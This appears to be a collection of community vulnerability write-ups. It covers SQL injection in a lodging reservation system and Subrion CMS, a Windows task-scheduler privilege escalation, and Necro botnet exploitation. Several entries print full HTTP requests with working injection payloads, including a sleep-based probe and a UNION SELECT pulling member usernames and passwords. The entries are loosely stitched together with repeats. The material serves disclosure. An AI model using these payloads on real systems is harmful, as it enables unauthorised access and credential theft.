1
Technical Analysis
CVE-2021-41511
Vendor
Description:
The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.
A malicious user can store a malicious payload into the accommodations app and can hijack the PHPSESSID, then he can use to hijack a login session.
Reproduce:
CVE Proof of Concept:
1
Technical Analysis
CVE-nu11-101821
Vendor
MySQL Request-1:
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
MySQL Response-1:
Response 1 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:37 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 7099 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... <b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28 Stack trace: #0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...') #1 {main} thrown in <b> ...[SNIP]...
MySQL Request-2:
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
MySQL Response-2
HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:40 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6832 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]...
MySQL Request-3
POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
MySQL Response-3
HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:51 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6811 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Bootstrap core CSS --> <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]...
Reproduce
Proof:
1
Technical Analysis
CVE-2021-41947
Description:
A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
This application should not incorporate any user-controllable data directly into SQL queries.
Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries.
In no circumstances should users be able to control or modify the structure of the SQL query itself?
MySQL Request:
GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1 Host: 192.168.1.4 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0
MySQL Response:
HTTP/1.1 200 OK Date: Sat, 16 Oct 2021 16:40:30 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/ Content-Length: 72 Connection: close Content-Type: application/json {"error":true,"message":"Action is forbidden.","code":403,"result":true}
Risk:
- Medium
Reproduce:
Proof
Indicated source as
- News Article or Blog (https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html)
Indicated source as
- News Article or Blog (https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html)
1
Technical Analysis
This is now being exploited in the wild by the Necro botnet as was reported at https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html
Indicated source as
- News Article or Blog (https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html)
1
Technical Analysis
This is now being exploited in the wild by the Necro botnet as was reported at https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html
Indicated source as
Now that this has been out and published a bit moe, we know that the bug here is that when an attacker uses the legacy task scheduler, the legacy task scheduler fails to impersonate the permissions of the user (as expected) and instead, simply runs it as itself- a local administrator. There’s a great writeput about it here: https://blog.0patch.com/2019/06/another-task-scheduler-0day-another.html
The TL;DR is that by invoking the legacy task scheduler on Windows 10 <= 1903 in the proper manner as an authenticated user, they can gain execution in the context of the scheduler itself (local administrator).